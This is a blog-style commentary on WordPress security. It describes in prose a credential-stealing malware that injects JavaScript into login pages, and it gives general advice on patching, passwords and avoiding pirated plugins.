According to a report from CodeGuard, WordPress now powers 79% of content-driven websites. By comparison, Joomla powers 7.2%, and Drupal 5.3%. The report further notes that designers and developers are flocking to the platform in droves; it’s gained more popularity in that market than it has among bloggers.
That popularity is a double-edged sword. On the one hand, the volume of WordPress users means more plugins, more themes, and better support. On the other, it also makes the platform that much more attractive a target for cyber-criminals.
To that end, there’s a distressing new type of attack making the rounds on the web – a piece of malware, to be precise. What makes it so problematic is that it doesn’t behave like any other WordPress malware. It doesn’t try to install anything on a user’s machine.
It attempts to steal the user’s login credentials instead.
“When unsuspecting users attempt to login to one of the compromised WordPress sites, they are served injected JavaScript code as part of the login page,” explains Zscaler, the firm which first broke news of the malware. “The end user is oblivious to the fact that the credentials were leaked to a remote attacker’s site, as he is redirected to a successful logged in session.”
I’d imagine there will be a fix for this vulnerability coming in short order. At the moment, however, the only defense against the infection is due diligence. Website owners can check to see if their site is compromised by searching for the code in question, as well.
It’s the same old song and dance we’ve heard a thousand times before. This time it’s malware. Last week, it was a plugin vulnerability. Then a glitch. Then more malware. Then brute forcing. Then…
You get the idea. WordPress attacks and vulnerabilities surface with such frequency, one can’t help but wonder why anyone uses the platform at all. Is ease of use really worth the security risks?
Honestly, the risks aren’t as great as everyone makes them out to be. The reason we see so many vulnerabilities on WordPress – the reason it’s targeted so frequently – is because of its popularity. That’s it. If it were Joomla or Drupal in WordPress’s place, it’d be the same story.
Of course, just because the vulnerabilities aren’t as pronounced as everyone makes them out to be, doesn’t mean you shouldn’t be taking measures to keep your site secure. You should be doing everything in your power to do so, actually. There are a few steps involved in this:
- Be Proactive: Don’t wait to update. Install patches, hotfixes, and new versions as soon as humanly possible. They were released for a reason, after all.
- Be Smart: Use strong passwords, and never use the same credentials for one site as you do for another. Make sure you install antivirus software on your site, and be sure to regularly check it for unusual behavior.
- Be Discerning: Avoid installing plugins or themes from unregulated, third-party sites – and never pirate premium plugins and themes. That’s just inviting your site to get infected.
- Be Informed: Follow the news to keep yourself apprised of newly-discovered vulnerabilities and attacks. Know how people are likely to attack your site, and how you can defend yourself.
WordPress is the most popular content management system in the world – which means it’s also the most popular target for criminals. As a website owner, it falls to you to make sure your own site isn’t an attractive target. Take charge of your security, or you’ll have only yourself to blame if your site gets compromised.